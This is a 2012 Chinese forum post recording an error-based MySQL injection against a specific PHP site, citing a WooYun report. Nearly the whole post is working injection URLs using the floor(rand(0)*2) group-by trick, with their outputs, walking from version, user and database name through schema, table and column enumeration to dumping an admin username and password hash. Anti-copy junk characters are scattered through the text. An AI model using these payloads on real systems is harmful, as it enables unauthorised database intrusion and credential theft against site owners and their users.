找回密码
 立即注册
查看: 2577|回复: 0
打印 上一主题 下一主题

php+mysql高级爆错注入经测算有效

[复制链接]
跳转到指定楼层
楼主
发表于 2012-9-13 17:52:09 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
http://www.wooyun.org/bugs/wooyun-2010-01666
4 K. M1 r7 B1 L& X7 c( K5 ^! ^4 i6 i1 M  i
之前想找个测试 没想到这有 可以测试下做个记录而已
! q9 f" g( d$ V8 i; Z+ ?5 `! i: S) t4 |5 d7 C1 H8 h
http://xxoo/download/downpage/netarea/id/1600003'+and+(select+1+from(select+count(*),concat(0x7c,(select+(Select+version())+from+information_schema.tables+limit+0,1),0x7c,floor(rand(0)*2))x+from+information_schema.tables+group+by+x+limit+0,1)a)%23/wapc/5000_0005_003
1 B3 a- t+ S2 Y+ W. _* p$ h6 N
9 t& O7 e4 E6 s/data0/htdocs/leqi_new/app/myapp.php
' @/ z) n% R- r3 Q4 n0 j4 A; h
) O. G& t) K9 a3 Z4 U 或者& l. E4 ~- _1 b, b* s
1 L1 |  w# p( x  w: D/ e
/**********version()**********/ 5.1.49-log  B  q1 e, [0 a
http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+version()),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_0032 d) t" P0 m5 G

* w4 ]0 K/ p# L& a5 M% B- N; V/**********user()**********/  
. @* U! U4 h: A0 whttp:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+user()),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_003& _5 t+ G6 O7 C$ i: _- |
4 x$ _4 J$ a  t8 C4 {3 T
/**********database()**********/  leqi
0 ?$ G9 B$ I! j6 R7 Lhttp:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+database()),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_0036 n1 u- @# Z. K* F! i

) ~0 i) }% d, S1 X: C4 ]" V' [* m+ r/**********limit依次递归爆库**********/, ?3 C* p4 H9 w) D7 G
http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+schema_name+from+information_schema.schemata+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_003
) v2 C) U6 g. S2 kinformation_schema
0 z: g7 P6 j7 [0 H" ?, ^* [& S+ \http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+schema_name+from+information_schema.schemata+limit+1,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_003
* I- {( t4 m& S3 Lleqi
- U2 D2 x: |/ _3 i1 a" ?http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+schema_name+from+information_schema.schemata+limit+2,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_0035 s0 V+ A- x* z2 ~& H* ]
test
& U1 ]' D# N5 C) j3 N
- U- D  s  ^0 Q/**********limit依次递归爆表名**********/, M+ l" R7 e$ n, Y/ q+ k$ R1 l
http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+table_name+from+information_schema.tables+where+table_schema=0x6C657169+limit+200,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_003
7 y) b7 g, P- |* G( Busers
; I: b& D6 r" [3 j  f/ |0 U9 @9 V+ T7 y; H, ?& ~% g
/**********limit依次递归爆字段名**********/
/ M6 ?- A7 T& e; Y1 o1 d/ {: Ghttp:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+column_name+from+information_schema.columns+where+table_schema=0x6C657169+and+table_name=0x7573657273+limit+3,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_003
4 D, y0 M: y3 F, Huser_id,username,nickname,passwd,group_id
) D. }' j- r' Mhttp:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+group_id+from+users+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23
' F8 @2 _- U5 I" G( E# c/wapc/5000_0005_003
/ B+ r/ ^$ A: x/ y8 x/ b5 s) |0 A11 21) c2 i3 P& v6 g/ D5 A6 ]( S9 `: T0 N
http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+user_id+from+users+limit+1,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23, Q- v, F7 l0 }# _- Y4 O9 P
/wapc/5000_0005_003
) R  t+ u. ^1 b6 o2 i11 341 351 361
5 W2 S' p9 S& N& G, u/**********爆数据**********/" R) X$ M/ N0 s% t% V+ A* O5 p, {! |8 M
http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+username+from+users+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23+ {) X& p! A) }4 q' A
admin# ?% M" Z+ B5 n$ @0 \9 G- M
http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+passwd+from+users+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23' [9 S$ B; @( i9 l' t" G& f
6a8b4574ca231eb8bd52764d4978ffcd
, {! C( }. C! V% I4 m5 q! G- M0 c3 b6 k& _. K, `0 d
/ A* h4 a% e. t  h) {2 ~, B
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表